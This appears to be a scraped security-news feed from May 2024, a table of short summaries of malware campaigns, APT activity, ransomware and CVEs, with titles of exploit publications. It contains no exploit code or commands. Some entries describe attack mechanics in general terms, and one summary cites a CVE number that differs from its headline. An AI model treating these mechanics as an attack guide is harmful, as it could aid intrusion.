20.5.24 |
Banking |
Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns |
||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
Prison Management System - SQL Injection Authentication Bypass |
|||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
||||
|
19.5.24 |
iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS) |
|||
|
19.5.24 |
||||
|
19.5.24 |
Vulnerebility |
In April 2024, while researching CVE-2023-36033, we discovered another zero-day elevation-of-privilege vulnerability, which was assigned CVE-2024-30051 identifier and patched on May, 14 as part of Microsoft’s patch Tuesday. |
||
|
19.5.24 |
Incident |
As an information security company, our services include incident response and investigation, and malware analysis. Our customer base spans Russia, Europe, Asia, South and North America, Africa and the Middle East. |
||
|
18.5.24 |
CVE |
(CVSS score: 9.3) - A use-after-free vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host |
||
|
18.5.24 |
CVE |
(CVSS score: 7.1) - A heap buffer-overflow vulnerability in the Shader functionality that could be exploited by a malicious actor with non-administrative access to a virtual machine with 3D graphics enabled to create a DoS condition |
||
|
18.5.24 |
CVE |
(CVSS score: 7.1) - An information disclosure vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine to read privileged information contained in hypervisor memory from a virtual machine |
||
|
18.5.24 |
CVE |
(CVSS score: 7.1) - An information disclosure vulnerability in the Host Guest File Sharing (HGFS) functionality that could be exploited by a malicious actor with local administrative privileges on a virtual machine to read privileged information contained in hypervisor memory from a virtual machine |
||
|
18.5.24 |
Group |
Kinsing Demystified A Comprehensive Technical Guide |
||
|
18.5.24 |
Hacking |
Kinsing Demystified A Comprehensive Technical Guide |
||
|
18.5.24 |
RAT |
Artificial Sweetener: SugarGh0st RAT Used to Target American Artificial Intelligence Experts |
||
|
18.5.24 |
CyberSpy |
Tracking the Progression of Earth Hundun's Cyberespionage Campaign in 2024 |
||
|
18.5.24 |
Backdoor |
More than one legitimate software package was modified to deliver malware in North Korean group’s recent campaign against South Korean organizations. |
||
|
17.5.24 |
CVE |
A cross-site request forgery (CSRF) vulnerability impacting D-Link DIR-600 routers that allows an attacker to change router configurations by hijacking an existing administrator session |
||
|
17.5.24 |
CVE |
An information disclosure vulnerability impacting D-Link DIR-605 routers that allows attackers to obtain a username and password by forging an HTTP POST request to the /getcfg.php page |
||
|
17.5.24 |
WIFI |
This vulnerability exploits a design flaw in the WiFi standard, allowing attackers to trick WiFi clients on any operating system into connecting to a untrusted network. |
||
|
17.5.24 |
APT |
Kimsuky APT attack discovered using Facebook & MS management console |
||
|
16.5.24 |
Group |
Threat actors misusing Quick Assist in social engineering attacks leading to ransomware |
||
|
16.5.24 |
CVE |
Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) |
||
|
16.5.24 |
APT |
ESET researchers provide technical analysis of the Lunar toolset, likely used by the Turla APT group, that infiltrated a European ministry of foreign affairs |
||
|
16.5.24 |
APT |
ESET researchers provide technical analysis of the Lunar toolset, likely used by the Turla APT group, that infiltrated a European ministry of foreign affairs |
||
|
16.5.24 |
REPORT |
400k Linux servers compromised for cryptocurrency theft and financial gain |
||
|
16.5.24 |
Cryptocurrency |
Ebury botnet alive & growing; 400k Linux servers compromised for cryptocurrency theft and financial gain |
||
|
16.5.24 |
The vivisection of a large Linux server-side credential stealing malware campaign |
|||
|
16.5.24 |
Virus |
A new malware dubbed Cuttlefish was reported to infect small office/home office and enterprise grade routers with the intent to monitor passing data traffic and discreetly exfiltrating only authentication related information such as usernames, passwords, and tokens etc. It also has the capability of introducing more payloads. |
||
|
16.5.24 |
Virus |
Remcos RAT, a remote access Trojan, enables unauthorized remote control and surveillance of compromised systems. Recently, Remcos RAT was observed leveraging a PrivateLoader module to augment its functionality and persistence on the victim's machine. By employing VB scripts,registry modification, and establishing services to restart the malware at varying intervals, this malware can thoroughly infiltrate a system, evade detection, and report statistics to its C2 server. |
||
|
16.5.24 |
Virus |
Many gamers prefer to enhance their gaming experience with custom mods, such as those offering the Windows Borderless feature. This feature enables multitasking and seamless switching between applications, facilitating tasks like game recording. |
||
|
16.5.24 |
Atomic Stealer (AMOS) among the malware variants spread in the GitCaught operation |
Virus |
A recent malicious campaign dubbed GitCaught has been reported to spread multiple infostealing payloads targeted at various platforms including macOS. The distributed malware variants include Atomic Stealer (AMOS), Vidar Stealer, Lumma and Octo banking trojan. The attackers have been leveraging fake profiles and repositories hosted on Github that offer software binaries masqueraded as various popular applications. Threat actors behind this campaign have also been utilizing web-based infrastructure including Filezilla FTP servers for malware delivery. |
|
|
16.5.24 |
PureCrypter malware used in Mallox ransomware distribution campaign |
Virus |
PureCrypter loader has been used in a recent malicious campaign leading up to the delivery of Mallox ransomware payloads. The attackers have been reported to employ brute-force attacks against vulnerable or otherwise mis-configured MS-SQL servers in the initial attacks stages. PureCrypter is a piece of Malware-as-a-Service (MaaS) offering and potentially leveraged by various affiliates. The delivered payloads might also exfiltrate the user data before encryption, as the Mallox ransomware operators have been known to employ double extortion techniques in the past attacks. |
|
|
16.5.24 |
Virus |
A recent Danabot malspam campaign was observed being delivered via a Word document containing a malicious external link which if clicked will launch a series of events where additional executable files will get downloaded including a command prompt, and a PowerShell. This process eventually leads to the dropping of payloads such as iu4t4.exe (Danabot) and rundll32.exe, which are responsible for collecting sensitive user and system information. |
||
|
15.5.24 |
Phorpiex botnet distributes LockBit Black Ransomware via email campaign |
BOTNET |
A high-volume email campaign facilitated by the Phorpiex botnet, delivering LockBit Black ransomware, has been reported. Phorpiex functions as a Malware-as-a-Service platform and has amassed a significant customer base among threat actors over more than a decade of operation. Since 2018, Phorpiex has been involved in activities such as data exfiltration and ransomware distribution. Despite attempts to disrupt its operations over the years, the botnet continues to persist. |
|
|
15.5.24 |
Virus |
Dracula (also known as Samurai Stealer) is an infostealing malware variant attributed to the threat group known as the Amnesia Team (aka Cerberus). This threat actor is known for using various other infostealer variants including Aurora, Lumma, Redline and Rhadamanthys, among others. Dracula Stealer is leveraged by the attackers to exfiltrate a wide range of confidential information from victim machines including credentials, banking information and others. |
||
|
15.5.24 |
Virus |
WaveStealer, a newly emerged sophisticated malware tool, is being distributed on platforms like Telegram and Discord for purchase at a low cost. This malware is disguised as video game installers and designed to extract various types of sensitive data from compromised systems. It targets web browsers, cryptocurrency wallets, credit card numbers, as well as data associated with messaging platforms like Telegram and Discord. Additionally, WaveStealer has the capability to capture screenshots, enhancing its data exfiltration capabilities. |
||
|
15.5.24 |
Virus |
A malware campaign exploiting Google Ads, attributed to the threat actor FIN7, has been reported in the wild. The attackers utilized deceptive websites masquerading as well-known brands like AnyDesk, WinSCP, BlackRock, Asana, Concur, and Google Meet. Visitors to these sites, often directed through sponsored Google Ads, encountered fake pop-ups urging them to download what seemed to be a browser extension. However, the downloaded payload was actually an MSIX file, a packaging format for Windows apps, which delivered NetSupport RAT and DiceLoader for subsequent stages in the infection chain. |
||
|
15.5.24 |
Beast Ransomware and Vidar Infostealer delivered via disguised documents |
RANSOM |
Documents like copyright violation warnings and resumes were leveraged in a recent campaign to deliver ransomware and infostealer. Initial infection initiates from a phishing email with an external malicious link that if clicked will download a compressed file. Upon decompression, two executable files will be dropped and these are identified as Beast Ransomware and Vidar Infostealer. |
|
|
15.5.24 |
SPAM |
Mobile wallets have transformed the financial landscape by providing convenience and accessibility, but they also present lucrative targets for cybercriminals as Symantec continues to observe a flurry of smishing around the world. |
||
|
15.5.24 |
RANSOM |
According to a recent research published by Cyble, Trinity is a newly identified ransomware variant believed to be an updated version of the “2023Lock” ransomware. The malware encrypts user files and appends “.trinitylock” extension to them. Trinity ransomware has also been reported to share some code base with yet another ransomware variant known as Venus. The threat actors behind Trinity are employing the double extortion techniques by also exfiltrating confidential files and threatening to publicly release them. |
||
|
15.5.24 |
Malspam campaign delivers ASyncRAT by way of multiple scripts |
Virus |
In a recently observed campaign, multiple scripts were used to deliver the ASyncRAT payload. Initiated by an HTML email attachment, victims would be compromised by various non-PE files to deliver and establish persistence of ASyncRAT. The attack downloads a Windows Script File (WSF) that in turn launches a VBS file that's responsible for further execution. Latter parts of the attack are carried out by JS, PowerShell, and batch script components. |
|
|
15.5.24 |
RANSOM |
Symantec Security Response is aware of the recent joint alert from CISA, the FBI, Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) regarding a number of targeted activities observed for the Black Basta ransomware. This malware variant is known since at least 2022 and has been leveraged in a number of campaigns targeted at critical infrastructure including the Healthcare and Public Health (HPH) sector. Black Basta is ransomware-as-a-service (RaaS) variant mostly distributed via phishing or exploitation of disclosed vulnerabilities. The attackers behind this malware often employ the double extortion model by not only encrypting user files but also by exfiltrating them and threatening with public release of the stolen data. |
||
|
15.5.24 |
Virus |
Researchers uncovered a new mining trojan dubbed "Hidden Shovel", discovered through network security monitoring. This Trojan was initially spotted back in November 2023 and has been undergoing multiple upgrades, currently at version 3.0. Hidden Shovel's key features are strong concealment, anti-analysis measures, DLL hijacking backdoor and shellcode injection capabilities. |
||
|
15.5.24 |
Social |
Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators |
||
|
15.5.24 |
CVE |
High CVE-2024-4761: Out of bounds write in V8. Reported by Anonymous on 2024-05-09 |
||
|
15.5.24 |
CVE |
(CVSS score: N/A) - A file inclusion issue in the "lib/plugin.php" file that could be combined with SQL injection vulnerabilities to result in remote code execution |
||
|
15.5.24 |
CVE |
(CVSS score: 8.8) - An SQL injection vulnerability in api_automation.php that allows authenticated users to perform privilege escalation and remote code execution |
||
|
15.5.24 |
CVE |
(CVSS score: 10.0) - A command injection vulnerability allows any unauthenticated user to execute arbitrary command on the server when the "register_argc_argv" option of PHP is On |
||
|
15.5.24 |
CVE |
(CVSS score: 9.1) - An arbitrary file write vulnerability in the "Package Import" feature that allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server, resulting in remote code execution |
||
|
15.5.24 |
CVE |
(CVSS score: 8.8) - Windows MSHTML Platform Security Feature Bypass Vulnerability |
||
|
15.5.24 |
CVE |
(CVSS score: 7.8) - Windows Desktop Window Manager (DWM) Core Library Elevation of Privilege Vulnerability |
||
|
14.5.24 |
CVE |
(CVSS score: 8.1) - A buffer overflow vulnerability that could allow a remote unauthenticated attacker to execute arbitrary code on the targeted system by sending a specially crafted SMS message. |
||
|
14.5.24 |
CVE |
(CVSS score: 7.8) - An improper privilege management vulnerability that could allow a local, low-privileged attacker to elevate privileges to manufacturer level on the targeted system. |
||
|
14.5.24 |
CVE |
(CVSS score: 6.8) - A files or directories accessible to external parties vulnerability that could allow an attacker with physical access to the target system to obtain read/write access to any files and directories on the targeted system, including hidden files and directories. |
||
|
14.5.24 |
CVE |
(CVSS score: 4.4) - A relative path traversal vulnerability that could allow a local, low-privileged attacker to escape from virtual directories and get read/write access to protected files on the targeted system. |
||
|
14.5.24 |
CVE |
(CVSS score: 3.3) - An exposure of sensitive information vulnerability that could allow a local, low-privileged attacker to disclose hidden virtual paths and file names on the targeted system. |
||
|
14.5.24 |
CVE |
(CVSS score: 3.3) - An exposure of sensitive information through environmental variables vulnerability that could allow a local, low-privileged attacker to obtain unauthorized access to the targeted system. |
||
|
14.5.24 |
CVE |
(CVSS score: 2.4) - An exposure of sensitive information vulnerability that could allow an attacker with physical access to the target system to get access to sensitive data on the targeted system. |
||
|
12.5.24 |
CVE-2024-24506 - LimeSurvey Community Edition XSS vulnerability |
VULNEREBILITY |
CVE-2024-24506 is a recently disclosed Cross Site Scripting (XSS) vulnerability affecting LimeSurvey Community Edition version 5.3.32. The bug is caused by improper validation of user-supplied input of the Administrator email address field. If successfully exploited, the vulnerability might allow the remote attackers to insert and execute arbitrary code via the Administrator email address parameter. |
|
|
12.5.24 |
VULNEREBILITY |
CVE-2024-1313 is a recently disclosed Broken Object-Level Authorization (BOLA) vulnerability affecting Grafana, which is a open-source data visualization web application. Successfull exploitation of this vulnerability might potentially lead to unauthorized access and data leak from the vulnerable dashboards. The unprivileged attackers might be allowed to bypass authorization and also delete Grafana dashboard snapshots. Grafana vendor has already released a patch to address this vulnerability. |
||
|
11.5.24 |
Stealer |
zEus Stealer Distributed via Crafted Minecraft Source Pack |
||
|
11.5.24 |
REPORT |
Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. |
||
|
11.5.24 |
Ransomware |
Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. |
||
|
11.5.24 |
APT |
FIN7 Uses Trusted Brands and Sponsored Google Ads to Distribute MSIX Payloads |
||
|
11.5.24 |
Malware traffic |
Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
||
|
10.5.24 |
Exploitation of Ivanti Pulse Secure vulnerabilities for Mirai botnet delivery |
Exploit |
In January of this year, Ivanti reported two vulnerabilities, CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection), affecting Ivanti Connect Secure and Ivanti Policy Secure Gateways. |
|
|
10.5.24 |
Malware campaign targeting Windows and MS Office users via software cracks |
Virus |
A malware campaign distributing RATs and coinminers via cracks for popular software, specifically targeting users of Windows and MS Office software, has been observed. The malware, once installed, often registers commands in the task scheduler to maintain persistence, enabling continuous installation of new malware even after removal. |
|
|
10.5.24 |
Coper Actors Abuse LiveChat CDN in Ongoing Fake Chrome Tactic |
Virus |
Symantec continues to observe daily instances of Coper malware disguised as a fake Chrome Android application. This tactic is not new having been in use for some time now. The attack chain's initial step remains uncertain, but recently observed Coper samples have been hosted on a content delivery network (CDN) used by LiveChat, a customer service platform. |
|
|
10.5.24 |
Malspam campaign: Password protected archive hosted on GitHub leads to AsyncRAT |
CAMPAIGN |
Over the past two weeks, Symantec has observed an actor leveraging a peculiar attack chain to distribute highly obfuscated payload onto compromised systems. The attacks start with malicious emails containing a malicious PDF, DOCX, or SVG file (REMITIRA A TRAVES DEL SERVICIO POSTAL AUTORIZADO.docx, Radicado juridico 23156484.svg, and 99-DEMANDA .docx). |
|
|
10.5.24 |
Exploit |
The use of Russian bulletproof hosting services for hosting malicious activities, including command-and-control (C2) servers and phishing pages distributing SocGholish malware, has been reported. Multiple malware campaigns in recent months have utilized the Matanbuchus loader, with their C2 infrastructure hosted on bulletproof hosting services like "Proton66 OOO". |
||
|
10.5.24 |
Virus |
A malware campaign targeting Minecraft players has been reported, where custom packages promising to enhance the game's appearance are actually distributing the zEus stealer. This infostealer is designed to evade detection while stealing sensitive data and dropping additional payloads, typically in the form of a batch file, to establish communication with a command-and-control (C2) server for further instructions. This malware is capable of capturing screenshots and exfiltrating data to a webhook server controlled by the threat actor. |
||
|
10.5.24 |
VPN |
Tricking the VPN client into using the wrong server IP |
||
|
10.5.24 |
VPN |
On Windows, Linux, macOS and Android we are not vulnerable to the LocalNet attack. We never leak traffic to public IPs outside the VPN tunnel. However, on iOS we are affected by this attack vector. |
||
|
10.5.24 |
CVE |
CVE-2024-4671: Use after free in Visuals. Reported by Anonymous on 2024-05-07 |
||
|
10.5.24 |
Android |
Coper is a descendant of ExoBotCompat, which was a rewritten version of Exobot. |
||
|
10.5.24 |
CVE |
Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. |
||
|
10.5.24 |
Cloud |
LLMjacking: Stolen Cloud Credentials Used in New AI Attack |
||
|
10.5.24 |
Bypassing Tunnels: Leaking VPN Client Traffic by Abusing Routing Tabl |
Papers |
Virtual Private Networks (VPNs) authenticate and encrypt network traffic to protect users’ security and privacy, and are used in professional and personal settings to defend against malicious actors, circumvent censorship, remotely work from home, etc. It is therefore essential that VPNs are secure. |
|
|
10.5.24 |
VPN |
TunnelCrack is a combination of two widespread security vulnerabilities in VPNs. An adversary can abuse these vulnerabilities to leak traffic outside the VPN tunnel. |
||
|
10.5.24 |
VPN |
A local network VPN leaking technique that affects all routing-based VPNs |
||
|
10.5.24 |
CVE |
DHCP can add routes to a client’s routing table via the classless static route option (121). VPN-based security solutions that rely on routes to redirect traffic can be forced to leak traffic over the physical interface. |
||
|
10.5.24 |
APT |
APT28 campaign targeting Polish government institutions |
||
|
9.5.24 |
DHCP |
In DHCP starvation attacks, an attacker floods the DHCP server with DHCP requests to consume all available IP addresses that the DHCP server can allocate. After these IP addresses are allocated, the server cannot allocate any more addresses and this situation leads to a Denial of Service (DoS) attack as new clients cannot gain network access. |
||
|
9.5.24 |
CVE |
DHCP can add routes to a client’s routing table via the classless static route option (121). VPN-based security solutions that rely on routes to redirect traffic can be forced to leak traffic over the physical interface. |
||
|
9.5.24 |
CVE |
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. |
||
|
9.5.24 |
CVE |
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks. |
||
|
9.5.24 |
CVE |
(CVSS score: 7.5) - An OData injection vulnerability that could allow an unauthenticated attacker to execute malicious SQL statements through the BIG-IP NEXT Central Manager API |
||
|
9.5.24 |
CVE |
(CVSS score: 7.5) - An SQL injection vulnerability that could allow an unauthenticated attacker to execute malicious SQL statements through the BIG-IP Next Central Manager API |
||
|
9.5.24 |
Virus |
A malware campaign targeting Minecraft players has been reported, where custom packages promising to enhance the game's appearance are actually distributing the zEus stealer. This infostealer is designed to evade detection while stealing sensitive data and dropping additional payloads, typically in the form of a batch file, to establish communication with a command-and-control (C2) server for further instructions. This malware is capable of capturing screenshots and exfiltrating data to a webhook server controlled by the threat actor. |
||
|
9.5.24 |
Virus |
APT37 (ScarCruft) continues to distribute RokRAT malware via LNK files particularly targeting South Korean users. The malware, disguised within a genuine document will execute PowerShell commands after activation. Subsequently, these commands will execute additional files, enabling attackers to gather user information and transmit that data back to their C2 servers. |
||
|
9.5.24 |
CAMPAIGN |
Symantec has recently observed an uptick in phishing campaigns being delivered out of Gadfly (aka TA577). This campaign entices users to open the attached PDF, named with a Latin word, containing a link utilizing typo squatted subdomains for Microsoft login services, with the end goal being credential theft for later use. |
||
|
9.5.24 |
RANSOM |
Hunt is another Dharma/Crysis ransomware variant discovered recently in the wild. The malware encrypts user files and appends .hunt extension to them alongside of a unique victim ID and the threat actor email address. The dropped ransom note in form of a text file asks the victims to contact the attackers via the provided email address for further instructions on how to restore the locked files. |
||
|
9.5.24 |
CVE-2024-27956 - WP-Automatic Plugin SQL Injection vulnerability exploited in the wild |
VULNEREBILITY |
CVE-2024-27956 is a recently disclosed critical (CVSS score 9.8) SQL injection (SQLi) vulnerability in WP-Automatic plugin prior to version 3.92.1. Successfully exploitation of this vulnerability might allow the attackers to run arbitrary SQL queries, create new admin accounts or upload malicious files onto the compromise servers. This vulnerability has been reported as being actively exploited in the wild. |
|
|
9.5.24 |
RANSOM |
Shinra, a recently discovered ransomware variant from the Proton malware family, encrypts files and appends the ".SHINRA3" extension while renaming file names to random strings. A ransom note is dropped as a text file called "#SHINRA-Recovery.txt" containing contact details, typically the attacker's email address. |
||
|
9.5.24 |
CVE-2024-2389 - Command Injection vulnerability affecting Progress Flowmon |
VULNEREBILITY |
CVE-2024-2389, a recently disclosed critical vulnerability with a CVSS score of 10, affects Progress Flowmon, a widely used network performance monitoring tool. If successfully exploited, the bug allows unauthenticated attackers to access the Flowmon web interface via crafted API requests. This compromise can lead further to arbitrary code execution on vulnerable systems. The proof-of-concept for this vulnerability has been released publicly and the vendor has already issued a patched version of the application. |
|
|
9.5.24 |
RANSOM |
Earlier in February this year the Lockbit ransomware family was targeted in a coordinated disruption operation called "Operation Cronos" that saw multiple members of this ransomware gang arrested, assets taken and a decryption tool released publicly. Despite those efforts Lockbit still remains active in the threat landscape and we recently observed a spike in detections related to this ransomware variant. Symantec's Advanced Machine Learning technology played a crucial role in blocking this attack by detecting the malicious emails at the beginning of the attack chain. |
||
|
8.5.24 |
Loader |
HijackLoader (a.k.a. IDAT Loader) is a malware loader initially spotted in 2023 that is capable of using a variety of modules for code injection and execution. |
||
|
8.5.24 |
CVE |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Stored XSS.This issue affects LiteSpeed Cache: from n/a through 5.7. |
||
|
8.5.24 |
CPU |
Pathfinder: High-Resolution Control-Flow Attacks Exploiting the Conditional Branch Predictor |
||
|
8.5.24 |
CPU |
Pathfinder: High-Resolution Control-Flow Attacks Exploiting the Conditional Branch Predictor |
||
|
8.5.24 |
Alert |
The Intelligent Platform Management Interface (IPMI) implementations in multiple manufacturer's Baseboard Management Controller (BMC) software are vulnerable to IPMI session hijacking. |
||
|
8.5.24 |
Alert |
A vulnerability in the R language that allows for arbitrary code to be executed directly after the deserialization of untrusted data has been discovered. |
||
|
7.5.24 |
APT |
Uncharmed: Untangling Iran's APT42 Operations |
||
|
7.5.24 |
CVE-2024-4040 - CrushFTP vulnerability exploited in the wild |
VULNEREBILITY |
CVE-2024-1852 is a recently disclosed injection vulnerability affecting CrushFTP versions before 10.7.1 and 11.1.0. Successful exploitation of this vulnerability could allow unauthenticated remote attackers to perform VFS Sandbox escape, bypass authentication, gain administrative privileges and potentially execute arbitrary remote code on the vulnerable servers. The vulnerability has been reported as being exploited in the wild and the vendor has already released patched version of the application. |
|
|
7.5.24 |
Counterfeit Revenue Agency page distributing VBlogger malware |
Virus |
A malware campaign involving a counterfeit Revenue Agency webpage hosted on an Italian domain has been reported. Upon accessing the site, users unwittingly download an archive containing a malware downloader, which in turn fetches the final payload via FTP to Altervista. The malware, dubbed "vblogger," is developed in VB6 and possesses keylogging and clipboard capture functionalities. The harvested information is stored in a text file and then sent to the command-and-control server (C2) on Altervista. |
|
|
7.5.24 |
Cuckoo: A new macOS malware targeting music ripping applications |
Virus |
A new macOS malware dubbed Cuckoo has been reported. This malware is distributed through websites that offer applications for ripping music from streaming services. Cuckoo boasts extensive functionality, including the collection of browser-stored information such as passwords, cookies, and other credentials. Additionally, it gathers system information and data related to installed cryptocurrency wallets and extensions. |
|
|
7.5.24 |
Android malware used in targeted attack against Indian defense forces |
Virus |
A socially engineered delivery through WhatsApp was leveraged to reportedly target Indian defense forces with a new Android malware by presenting itself as a defense-related application. Upon successful delivery, the application would install itself under the guise of a Contacts application. Upon execution, the app would request permissions for SMS, Contacts, Storage, and Telephone and subsequently remove itself from view. |
|
|
7.5.24 |
Stealer |
Post-infection traffic triggers signatures for Win32/MetaStealer Related Activity from the EmergingThreats Pro (ETPRO) ruleset. |
||
|
7.5.24 |
VBS |
CharmingCypress: Innovating Persistence |
||
|
7.5.24 |
Python |
Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion |
||
|
7.5.24 |
CVE |
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. |
||
|
7.5.24 |
CVE |
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks. |
||
|
6.5.24 |
CVE |
A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability. |
||
|
6.5.24 |
CVE |
A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability. |
||
|
6.5.24 |
Apple |
Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware |
||
|
5.5.24 |
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure |
|||
|
5.5.24 |
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass |
|||
|
5.5.24 |
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure |
|||
|
5.5.24 |
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass |
|||
|
5.5.24 |
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure |
|||
|
5.5.24 |
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass |
|||
|
4.5.24 |
ANALÝZA |
The report covers the tactics, techniques and tools most commonly deployed by threat actors, the nature of incidents detected and their distribution among MDR customers. |
||
|
3.5.24 |
NiceCurl and TameCat custom backdoors leveraged by Damselfly APT |
APT |
NiceCurl and TameCat are two custom backdoor variants recently leveraged in malicious campaigns attributed to the Damselfly APT (also known as APT42). These backdoors are reported to be delivered mostly by spear-phishing campaigns and used by the threat actors for the purpose of initial access to the targeted environments. While NiceCurl is a VBScript-based malware with capabilities to download and execute additional modules, TameCat backdoor is used to execute PowerShell and C# scripts as well as download additional arbitrary content. |
|
|
3.5.24 |
TesseractStealer malware leverages OCR engine for information extraction |
Virus |
TesseractStealer is an infostealer recently distributed by variants of the ViperSoftX malware. This malware leverages Tesseract (an open source OCR engine) in an effort to extract text from user image files. The malware focuses on specific data related to credentials and cryptocurrency wallet information. Next to TesseractStealer, some of the recent ViperSoftX runs have also been observed to drop another payload from the QuasarRAT malware family. |
|
|
3.5.24 |
CAMPAIGN |
The infection chain for this campaign initiates from an email file with an HTML attachment. This HTML file uses a background image that resembles what looks like a blank Microsoft Document file, where instructions on how to fix the offline viewing of the file can be seen. This is an attempt to trick victims into pasting malicious PowerShell code into a Windows Terminal. Once the code is executed, an HTA file will be downloaded and will continue to execute, eventually downloading a follow-up ZIP file. Once extracted, it will launch an open-source automation engine called AutoIt to execute a malicious AutoIt script named script.a3x that will eventually load the Darkgate trojan. |
||
|
3.5.24 |
Virus |
A recent report by SentinelOne outlines changes observed to a recent macOS malware Adload. The most recent variants of this malware family come with capabilities allowing it to evade the latest Apple XProtect signatures. Adload malware has been present in the macOS landscape for several years now, known to be distributed via drive-by-downloads and often used in attempts to hijack browser search results, inject ads into webpages or deliver various payloads to the victims. |
||
|
3.5.24 |
Virus |
ZLoader, a modular trojan, has implemented anti-analysis capabilities that appear to be lifted from the ZeuS source code. This 'new' ability allows ZLoader to block installation on machines other than where the initial infection occurred, stopping further stages from deploying, in the hopes of hindering in depth analysis. |
||
|
3.5.24 |
BOTNET |
According to a recent report from FortiGuard Labs, a new botnet variant dubbed Goldoon has been observed in the wild. This malware targets the exploitation of an old D-Link vulnerability from 2015 - CVE-2015-2051 for its propagation. Goldoon can establish persistence on the affected device and execute commands received from C2 servers. The attackers might use this malware variant to gain control over the infected devices, collect system information as well as perform various forms of distributed denial-of-service (DDoS) attacks. |
||
|
3.5.24 |
BirdyClient malware leverages Microsoft Graph API for C&C communication |
Virus |
An increasing number of threats have begun to leverage the Microsoft Graph API, usually to facilitate communications with command-and-control (C&C) infrastructure hosted on Microsoft cloud services. The technique was most recently used in an attack against an organization in Ukraine, where a previously undocumented piece of malware called BirdyClient used the Graph API to leverage Microsoft OneDrive for C&C purposes. |
|
|
3.5.24 |
DarkGate loader malware has been a very actively distributed within the last year. Numerous email campaigns have leveraged various attack chains to deliver the DarkGate payload. Emails have been observed containing direct download links while others may use attachments (PDF, ZIP, etc) to initiate the delivery. |
|||
|
3.5.24 |
Virus |
Dwphon is a recently identified malware variant targeting the Android platform. The malware has the functionality to collect information about the infected device, the info about applications installed on the device as well as some confidential personal information. Dwphon might consist of several distinct modules, each with its own functions and C2 instructions. |
||
|
3.5.24 |
Virus |
No countries or financial institutions are exempt from having their brands abused to lure mobile users into installing Android malware—a trend that continues to grow. Symantec has recently observed an actor actively targeting users in Kazakhstan with the SpyNote RAT. |
||
|
3.5.24 |
GuLoader campaign targeting industries in Russian-speaking countries |
CAMPAIGN |
An actor has been observed running two email campaigns with different social engineering tactics that lead to Guloader. Both campaigns target industries in Russian-speaking countries such as Russia, Belarus, Kyrgyzstan, and Kazakhstan. |
|
|
3.5.24 |
Papers |
Subgraph representation learning is a technique for analyzing local structures (or shapes) within complex networks. Enabled by recent developments in scalable Graph Neural Networks (GNNs), this approach encodes relational information at a subgroup level (multiple connected nodes) rather than at a node level of abstraction. |
||
|
3.5.24 |
Trojan |
The Black Lotus Labs team at Lumen Technologies is tracking a malware platform we’ve named Cuttlefish, that targets networking equipment, specifically enterprise-grade small office/home office (SOHO) routers. |
||
|
3.5.24 |
Backdoor |
Playing Possum: What's the Wpeeper Backdoor Up To? |
||
|
3.5.24 |
BOTNET |
New “Goldoon” Botnet Targeting D-Link Devices |
||
|
3.5.24 |
|
Graph: Growing number of threats leveraging Microsoft API |
||
|
3.5.24 |
CERT |
North Korean Actors Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts |
||
|
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol |
||
|
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol |
